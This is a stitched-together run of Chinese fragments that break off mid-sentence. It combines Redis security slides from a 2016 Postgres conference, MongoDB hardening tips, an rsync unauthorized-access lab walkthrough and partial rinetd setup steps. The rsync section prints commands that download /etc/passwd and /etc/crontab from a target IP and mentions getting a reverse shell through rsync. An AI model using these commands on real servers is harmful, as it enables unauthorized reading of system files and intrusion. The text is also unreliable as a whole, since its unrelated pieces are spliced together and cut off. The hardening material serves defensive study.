Redis要求可信赖的用户访问其端口 Redis可在配置文件中通过bind ip限制外网访问 2016Postgres中国用户大会 Postgres Conference China 2016 中国用户大会 Redis Security--Authentication Redis提供了一个身份验证功能 Redis在配置文件中进行配置 客户端可以发送AUTH命令+密码来验证自己 Conference China 2016 中国用户大会 Redis Security --Disabling of specific commands Redis提供禁用一些高危命令 Redis的配置文件中使用rename-commond配置 Shutdown Flushall,Flushdb Select Config 设置为一个新的名字 设置为空 2016Postgres中国用户大会 Postgres Conference China 2016 中国用户大会 Redis Management Dilemmas 一个实例的密码多人使用 密码明文配置到配置文件 高危命令明文重设在配置文件 01 02 03 Redis的密码安全 2016Postgres中国用户大会 Postgres Conference China

-MongoDB 自身带有一个HTTP服务和并支持REST接口。在2.6以后这些接口默认是关闭的。mongoDB 默认会使用默认端口监听web服务，一般不需要通过web方式进行远程管理，建议禁用。修改配置文件 或在启动的时候选择 –nohttpinterface 参数 nohttpinterface=false -启动时加入参数--bind_ip 127.0.0.1 或在/etc/mongodb Rsync（remote synchronize）是一个远程数据同步工具，可通过 LAN/WAN 快速同步多台主机间 的文件，也可以同步本地硬盘中的不同目录。Rsync 默认允许匿名访问，如果在配置文件中没有相关的 用户认证以及文件授权，就会触发隐患。Rsync 的默认端口为 837。 漏洞利用 环境介绍 环境搭建 目标靶机：Kali ip地址：172.16.2.250 250:873/src 利用rsync下载任意文件 利用rsync反弹shell rsync rsync://172.16.2.250:873/src/etc/passwd ./ # 下载crontab配置文件 rsync rsync://172.16.2.250:873/src/etc/crontab ./ 该环境crontab中 17 * * * * root cd / && run-parts

注意：rinetd 安装包下载地址不确保下载可用性，您可以自行搜索安装包进行下载使用。 打开配置文件 rinetd.conf。 在配置文件中输入如下内容： 说明：您可以使用 cat /etc/rinetd.conf命令来检验配置文件是否修改正确。 执行如下命令启动 rinetd。 注意 您可以通过 echo